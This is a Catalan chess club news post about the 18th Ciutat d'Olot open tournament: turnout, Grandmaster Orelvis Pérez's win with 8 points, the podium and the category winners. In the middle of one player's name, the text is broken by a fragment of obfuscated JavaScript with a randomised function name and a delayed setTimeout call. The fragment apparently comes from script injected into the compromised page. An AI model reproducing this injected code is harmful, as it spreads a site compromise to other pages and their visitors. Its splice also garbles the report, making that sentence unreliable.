Orelvis Perez guanya el XVIII Ciutat d’Olot

Comparteix-ho amb els teus amics:

Com cada últim diumenge de juliol, una nova edició de l’Obert Internacional Ciutat d’Olot, inclòs dins el Circuit Català i amb 1.665 € en premis, s’ha celebrat amb un èxit rotund.

Tot i que aquest any coincidia amb dos dels millors tornejos d’Espanya celebrats relativament prop d’Olot, a Sitges i Andorra, s’ha pogut aconseguir una de les millors xifres de participants amb 108 jugadors. Les 11 diferents nacionalitats dels jugadors juntament amb la gran varietat de nivell (alguns els millors d’Espanya i Sud-amèrica, i altres persones que feia poc que s’havia iniciat en els escacs) i de totes les edats (des dels més menuts amb 7 anys fins al mític senyor Bosch, amb els 93 anys a tocar!) ha convertit a Olot en la capital gironina dels escacs per un dia i reafirmant l’actiu com un dels millors de Catalunya.

El campió de la XVIII edició ha estat el Gran Mestre cubà Orelvis Pérez, en solitari amb 8 punts. El podi l’han acompanyat el peruà Miguel Muñoz, amb 7,5 punts, i el colombià Jaime Alexandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ander Cuartas, millor classificat del grup amb 7 punts. Els campions de tram han estat el MI René Alonso, el MC Eduard Aymerich, Ricard Nadal, Francesc Xavier Saurina (destacar el seu gran torneig amb 6,5 punts i millorant 28 llocs al rànquing), Àlvaro Roa i Abel Làzaro. El millor sub14 ha estat Asier Casares del Llinars, la millor jugadora Mònica Vilar i el millor local Jordi Triadú.

CLASSIFICACIÓ FINAL

Galeria fotogràfica:

Info i fotos: Club Escacs Olot